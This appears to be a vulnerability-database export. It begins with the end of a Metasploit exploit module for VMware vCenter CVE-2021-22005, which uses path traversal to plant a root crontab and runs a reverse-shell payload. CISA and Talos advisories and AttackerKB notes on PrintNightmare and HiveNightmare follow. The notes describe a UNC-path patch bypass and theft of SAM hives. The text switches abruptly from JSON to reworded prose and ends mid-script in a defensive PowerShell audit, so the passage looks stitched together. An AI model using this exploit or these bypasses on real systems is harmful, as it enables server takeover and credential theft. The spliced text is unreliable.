\n}, \n'Author' => [ \n'George Noseevich', # Discovery \n'Sergey Gerasimov', # Discovery \n'VMware', # Initial PoC \n'Derek Abdine', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-22005'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'], \n['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'], \n['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'], \n['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee'] \n], \n'DisclosureDate' => '2021-09-21', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'WfsDelay' => 60 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'), \n'vars_get' => { \n'_c' => '' \n} \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body == '\"FULL\"' \nreturn CheckCode::Safe('CEIP is not fully enabled.') \nend \n \nCheckCode::Appears('CEIP is fully enabled.') \nend \n \ndef exploit \nprint_status('Creating path traversal') \n \nunless write_file(rand_text_alphanumeric(8..16)) 
\nfail_with(Failure::NotVulnerable, 'Failed to create path traversal') \nend \n \nprint_good('Successfully created path traversal') \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \nprint_warning(\"Please wait up to #{wfs_delay} seconds for a session\") \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Writing system crontab: #{crontab_path}\") \n \ncrontab_file = crontab(cmd) \nvprint_line(crontab_file) \n \nunless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file) \nfail_with(Failure::PayloadFailed, 'Failed to write system crontab') \nend \n \nprint_good('Successfully wrote system crontab') \nend \n \ndef write_file(path, data = nil) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'), \n'ctype' => 'application/json', \n'vars_get' => { \n'_c' => '', \n'_i' => \"/#{path}\" \n}, \n'data' => data \n) \n \nreturn false unless res&.code == 201 \n \ntrue \nend \n \ndef crontab(cmd) \n# https://man7.org/linux/man-pages/man5/crontab.5.html \n<<~CRONTAB.strip \n* * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/ \n* * * * * root #{cmd} \nCRONTAB \nend \n \ndef crontab_path \n\"/etc/cron.d/#{crontab_name}.json\" \nend \n \ndef crontab_name \n@crontab_name ||= rand_text_alphanumeric(8..16) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164439/vmware_vcenter_analytics_file_upload.rb.txt"}], "talosblog": [{"lastseen": "2021-08-13T00:41:37", "description": "By Edmund Brumaghin, Joe Marshall, and Arnaud Zobec. 
Executive Summary Another threat actor is actively exploiting the so-called PrintNightmare vulnerability (CVE-2021-1675 / CVE-2021-34527) in Windows' print spooler service to spread laterally across a victim's network as part of a recent...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T16:16:46", "type": "talosblog", "title": "Vice Society Leverages PrintNightmare In Ransomware Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-12T16:16:46", "id": "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DO1FBKPzvIs/vice-society-ransomware-printnightmare.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T22:35:10", "description": "Over the past several weeks, there's been a lot of discussion about a particular privilege escalation vulnerability in Windows affecting the print spooler, dubbed PrintNightmare. 
The vulnerability (CVE-2021-1675/CVE-2021-34527) has now been patched multiple times but is believed to still be...", "cvss3": {}, "published": "2021-07-08T13:25:03", "type": "talosblog", "title": "PrintNightmare: Here\u2019s what you need to know and Talos\u2019 coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:25:03", "id": "TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/xyAn8M5kWIs/printnightmare-coverage.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-07-08T18:09:13", "description": "_(Updated July 2, 2021) _For new information and mitigations, see [Microsoft's updated guidance for the Print spooler vulnerability (CVE-2021-34527)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n_(Updated July 1, 2021) _See [Microsoft's new guidance for the Print spooler vulnerability (CVE-2021-34527)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) and apply the necessary workarounds. \n\n_(Original post June 30, 2021)_ The CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for a critical remote code execution vulnerability in the Windows Print spooler service, noting: \u201cwhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675.\u201d An attacker can exploit this vulnerability\u2014nicknamed PrintNightmare\u2014to take control of an affected system.\n\nCISA encourages administrators to disable the Windows Print spooler service in Domain Controllers and systems that do not print. 
Additionally, administrators should employ the following best practice from Microsoft\u2019s [how-to guides](<https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-print-spooler>), published January 11, 2021: \u201cDue to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object.\u201d \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "cisa", "title": "PrintNightmare, Critical Windows Print Spooler Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", 
"CVE-2021-34527"], "modified": "2021-07-02T00:00:00", "id": "CISA:367C27124C09604830E0725F5F3123F7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T18:12:56", "description": "Microsoft has released [out-of-band security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) to address a remote code execution (RCE) vulnerability\u2014known as PrintNightmare (CVE-2021-34527)\u2014in the Windows Print spooler service. According to the CERT Coordination Center (CERT/CC), \u201cThe Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.\u201d\n\nThe updates are cumulative and contain all previous fixes as well as protections for CVE-2021-1675. The updates do not include Windows 10 version 1607, Windows Server 2012, or Windows Server 2016\u2014Microsoft states updates for these versions are forthcoming. Note: According to CERT/CC, \u201cthe Microsoft update for CVE-2021-34527 only appears to address the Remote Code Execution (RCE via SMB and RPC) variants of the PrintNightmare, and not the Local Privilege Escalation (LPE) variant.\u201d See [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) for workarounds for the LPE variant.\n\nCISA encourages users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds. 
For additional background, see [CISA\u2019s initial Current Activity on PrintNightmare](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>).\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-06T00:00:00", "id": "CISA:6C836D217FB0329B2D68AD71789D1BB0", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:14:34", "description": "On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server.\n\nOn September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability.\n\nTo mitigate CVE-2021-22005, CISA strongly urges critical infrastructure entities and other organizations with affected vCenter Server versions to take the following actions.\n\n * Upgrade to a fixed version as quickly as possible. See VMware Security Advisory [VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) for patching information.\n * Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately. 
See VMware\u2019s [workaround instructions for CVE-2021-22005,](<https://kb.vmware.com/s/article/85717>) [supplemental blog post,](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) and [frequently asked questions](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) for additional information.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cisa", "title": "VMware vCenter Server Vulnerability CVE-2021-22005 Under Active Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-24T00:00:00", "id": "CISA:D9F4EE6727B9BF3A40025E9D70945311", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:32:30", "description": "CISA has issued [Emergency Directive (ED) 21-04: Mitigate Windows Print Spooler Service Vulnerability](<https://www.cisa.gov/emergency-directive-21-04>) addressing [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Attackers can exploit this vulnerability to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nSpecifically, ED 21-04 directs federal departments and agencies to immediately apply the [Microsoft July 2021 updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) and disable the print spooler service on servers on Microsoft Active Directory (AD) Domain Controllers (DCs).\n\nAlthough ED 21-04 applies to Executive Branch departments and agencies, CISA strongly recommends that state and local governments, private sector organizations, and others review [ED 21-04: Mitigate Windows Print Spooler Service Vulnerability](<https://www.cisa.gov/emergency-directive-21-04>) for additional mitigation recommendations.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "cisa", "title": "CISA Issues Emergency Directive on Microsoft Windows Print Spooler", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-01-25T00:00:00", "id": "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/cisa-issues-emergency-directive-microsoft-windows-print-spooler", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T11:35:47", "description": "CISA and the Federal Bureau of Investigation (FBI) have released a [joint Cybersecurity Advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>) that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. The actors then exploited a critical Windows Print Spooler vulnerability, \u201cPrintNightmare\u201d (CVE-2021-34527), to run arbitrary code with system privileges. The advisory provides observed tactics, techniques, and procedures, as well as indicators of compromise and mitigations to protect against this threat. 
\n\nCISA encourages users and administrators to review [AA22-074A: Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>). For general information on Russian state-sponsored malicious cyber activity, see [cisa.gov/Russia](<https://www.cisa.gov/uscert/russia>). For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure, as well as additional mitigation recommendations, see [AA22-011A: Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure](<https://www.cisa.gov/uscert/ncas/alerts/aa22-011a>) and [cisa.gov/shields-up](<https://www.cisa.gov/shields-up>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-15T00:00:00", "type": "cisa", "title": "Russian State-Sponsored Cyber Actors Access Network Misconfigured with Default MFA Protocols", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-15T00:00:00", "id": "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-10-18T16:33:50", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**kevthehermit** at June 30, 2021 1:53pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. 
It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**andretorresbr** at July 02, 2021 2:37am UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**architect00** at July 01, 2021 1:46pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. 
It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**NinjaOperator** at June 29, 2021 5:55pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**ccondon-r7** at July 01, 2021 1:43pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. 
It has been tested in Server 2016 and Server 2019.

Disabling the print spooler can prevent exploitation.

Event logs can be found for both successful and non-successful exploit attempts in some situations.

Sigma rules can be found at: <https://github.com/SigmaHQ/sigma/pull/1592>

Assessed Attacker Value: 5, 5, 5

Published 2021-06-08; modified 2023-10-07. CVSS v3.1 base score 8.8 (HIGH), `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`; CVSS v2 base score 9.3 (HIGH), `AV:N/AC:M/Au:N/C:C/I:C/A:C`. CVEs: CVE-2021-1675, CVE-2021-34527. Source: <https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675> (AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9).

### CVE-2021-34527 "PrintNightmare" (AttackerKB)

Windows Print Spooler Remote Code Execution Vulnerability

**Recent assessments:**

**zeroSteiner** at July 08, 2021 5:09pm UTC reported:

CVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker-controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with `NT AUTHORITY\SYSTEM` privileges.

The patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\1.2.3.4\public\payload.dll`) to the alternative syntax (`\??\UNC\1.2.3.4\public\payload.dll`).

With the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return `ERROR_ACCESS_DENIED`.

**ccondon-r7** at July 08, 2021 12:12am UTC reported the same assessment.

Assessed Attacker Value: 5, 5, 4

Published 2021-07-02; modified 2022-05-25. CVSS v3.1 base score 8.8 (HIGH), `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`; CVSS v2 base score 9.3 (HIGH), `AV:N/AC:M/Au:N/C:C/I:C/A:C`. CVEs: CVE-2021-1675, CVE-2021-34527. Source: <https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare> (AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800).

### CVE-2021-36934 Windows Elevation of Privilege (AttackerKB)

Windows Elevation of Privilege Vulnerability

**Recent assessments:**

**Dviros** at July 25, 2021 9:35am UTC reported:

Vulnerability is easy to exploit – by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges.

Several exploits were already released, allowing them to parse the hashes while copying the `SAM`, `SECURITY` and `SYSTEM` hives:

* <https://github.com/cube0x0/CVE-2021-36934>
* <https://github.com/HuskyHacks/ShadowSteal>

This vulnerability occurs due to the permissive `C:\Windows\System32\Config\*.*` privileges, `BUILTIN\Users`, allowing any user to read and execute the files.

**ccondon-r7** at July 21, 2021 4:24pm UTC reported the same assessment.

Assessed Attacker Value: 5, 5, 5

Published 2021-07-22; modified 2023-10-07. CVSS v3.1 base score 7.8 (HIGH), `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`; CVSS v2 base score 4.6 (MEDIUM), `AV:L/AC:L/Au:N/C:P/I:P/A:P`. CVE: CVE-2021-36934. Source: <https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege> (AKB:68C898AA-7786-44EB-AA49-BDCE98588D8C).
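The assessment above covers the attacker's side of CVE-2021-36934: copy the hives out of a shadow copy, then dump the hashes. The PowerShell below is an added example, not code from AttackerKB, Microsoft or Rapid7, for the defender's side. It checks whether the live hive files still carry the `BUILTIN\Users` read ACE, lists shadow copies (a copy taken while the ACL was wrong still serves a readable SAM after the live ACL is fixed), and with `-Remediate` applies the two steps of Microsoft's KB5005357 workaround. It assumes an elevated Windows PowerShell 5.1 session; the script structure, switch and function names are my own.

```powershell
# Added example; not code from the MSRC advisory, AttackerKB or Rapid7.
# Audits a host for the CVE-2021-36934 condition (BUILTIN\Users able to read
# the live registry hives, plus shadow copies that froze the hives while the
# ACL was wrong) and, with -Remediate, applies the KB5005357 workaround.
# Assumes an elevated Windows PowerShell 5.1 session; 'BUILTIN\Users:(I)(RX)'
# in icacls output is the indicator Microsoft's own guidance uses for the
# vulnerable ACL.
[CmdletBinding(SupportsShouldProcess)]
param([switch]$Remediate)

$configDir = Join-Path $env:windir 'System32\config'
$hives     = 'SAM', 'SECURITY', 'SYSTEM'

function Get-ExposedHives {
    # Names of hives whose live file carries an inherited read/execute ACE for
    # BUILTIN\Users; an empty result means the live ACL is already restricted.
    foreach ($hive in $hives) {
        $aces = & icacls.exe (Join-Path $configDir $hive) 2>$null
        if ($aces -match 'BUILTIN\\Users:\(I\)\(RX\)') { $hive }
    }
}

function Get-ShadowCopies {
    # A shadow copy is a frozen view of the volume; one taken while the ACL
    # was permissive still exposes a readable SAM after the live ACL is fixed,
    # which is why Microsoft says installing the update alone is not enough.
    Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue |
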